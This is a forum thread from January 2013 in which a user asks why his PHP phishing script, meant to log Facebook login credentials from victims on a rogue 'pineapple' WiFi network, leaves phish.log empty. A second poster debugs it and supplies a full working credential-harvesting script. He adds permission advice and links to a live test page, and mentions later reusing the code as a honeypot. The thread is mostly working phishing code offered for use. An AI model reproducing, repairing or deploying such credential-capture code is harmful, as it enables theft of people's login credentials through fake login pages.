Win SCP

[AlienG]

Can someone help me put? My problem is that on the below script after testing Facebook page nothing was saved on phish.log. Or should I use the one Darren has posted? Thanks

<?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) {        $nam = stripslashes($_POST['name']);        $pas = stripslashes($_POST['pass']);        $nam = htmlspecialchars($nam, ENT_QUOTES);        $pas = htmlspecialchars($pas, ENT_QUOTES);        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;        $filed = @fopen("pineapple/phish.log", "a+");        @fwrite($filed, "$content\n");        @fclose($filed); } ?>

<html><body>

<script type=text/javascript">

function goBack()

{

window.history.back()

}

</script>

</head>

<body onload="goBack()">

</body></html>

[Mr-Protocol]

Not sure how this relates to SCP.

[digip]

I see a few issues right off the bat, but why you made the topic about SCP, don;t know. Anyway, your @ signs are hiding your errors, which I suspect would tell you, the file and directory do not exist. Here is a test script and fix:

<form method="post" action="phish.php">
<table>
	<tr><td>Name:</td><td> <input type="text" name="name" value="" /></td></tr>
	<tr><td>Pass:</td><td><input type="password" name="pass" value="" /></td></tr>
</table>
<input type="submit" value="Submit" />
</form>

<?php 

	if(isset($_SERVER['HTTP_REFERER'])){
		$ref = htmlspecialchars(stripslashes($_SERVER['HTTP_REFERER']),ENT_QUOTES | ENT_HTML401,"UTF-8"); 
	} else {
		$ref = "No Referrer was given by the browser.";
	}

	$today = date("F j, Y, g:i a"); 
	if(isset($_POST['name']) && isset($_POST['pass'])) { 
		$nam = htmlspecialchars((stripslashes($_POST['name'])),ENT_QUOTES | ENT_HTML401,"UTF-8");  
		$pas = htmlspecialchars((stripslashes($_POST['pass'])),ENT_QUOTES | ENT_HTML401,"UTF-8"); 
		$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas. "\r\n";
	
	$filename = (dirname(__FILE__)."/pineapple/phish.log");
	
	if(!file_exists($filename)) {
		echo "File does not exist, creating file:";
		mkdir(dirname(__FILE__)."/pineapple/", 0755);
		file_put_contents(dirname(__FILE__)."/pineapple/phish.log", $content, LOCK_EX);
		//$filed = @fopen($filename, "a+"); 
		//@fwrite($filed, "$content\n"); 
		//@fclose($filed);
		echo "Content logged.";
	} else {
	
		$filed = @fopen($filename, "a+"); 
		@fwrite($filed, "$content"); 
		@fclose($filed);
		echo "Content logged.";
	}
}
?>

Updated to sanitize referrer, since they can be forged as well and pose a threat.

Edited January 5, 2013 by digip

[AlienG]

digip,

Thanks a lot and not sure why I named SCP might be the frustration of been working with this for hours butr anyways. Not sure what am I doing wrong here but I tried your script and is showin an error on line 27 and 28. Also to make sure I am doing everything else correct.

The victim/test computer has to connect to the "pineapple SSID" right?

When I log in to "facebook.com" shows on the URL www.facebook.com/facebook.html, which it is correct, I think...

then the page after trying to log in return to the same page like an error.

after that I check on the phish.log folder and appears empty.

[digip]

Does your script have permissions to write to the file system? Lines 27 and 28 are in the section that checks if the directory and file exist and if not, it tries to create the directory first, then writes to the file for the first time. Then, every time after that, if the file is there, it skips down to the next section and appends the file. It can't append a file that doesn't exist though, and would need to do a write to it for the first time. Either way, maybe you need to sudo run something as root, not sure. I don't own a pineapple, but I wrote the above more or less as a stand alone PHP file and tested it on my own site, and it logged all entries for me, but when I ran your original code, I took out the @ signs, since they hide errors, and could see, the directory and files did not exist, so thats why I added a section to first check if the file exists at all, and if not, create the directory, then the file, then every subsequent time its run, the file is already there and it will just append the file.

I'm going to assume the problem might be a permissions issue on the user you run as to create the file maybe, but upload that script to any linuxe host running a web server, and the file should work fine with any PHP install.

If someone else owns a pineapple, maybe they can shed some light on why the script errors out, but I have a feeling its a permissions issue, not being able to create the directory and file in the path the script is run from.

The above form area part, was only for debugging and testing the script to show it worked. Try on a stand alone web server and tell me if you get the same problem visiting the phish.php page. The entire code above, is save to a file I named phish.php and thats the page you visit that shows the form and how I tested it. You might need to modify it to your needs to what is stored on the pineapple, or the file system/path is not writable.\

edit: also noted above, you said "facebook.html". PHP needs a file extension of php, not html, or the code won't run unless you add html as a mime type to execute as php. Not sure if that is the issue either, would need to see everything and know everything about the file system, web server and its configuration. Best I can do is give you working PHP code, you'll need to work out the rest.

Here is my test page: http://www.attack-scanner.com/phish/phish.php

And the logs is here: http://www.attack-scanner.com/phish/pineapple/phish.log

Try adding some entries.

Edited January 5, 2013 by digip

[digip]

Just wanted to add, this code does work. I've even modified it to use as a honeypot on my WordPress sites now for people trying to brute force their way into my site:

http://pastebin.com/raw.php?i=sqWRkd5a

Edited January 6, 2013 by digip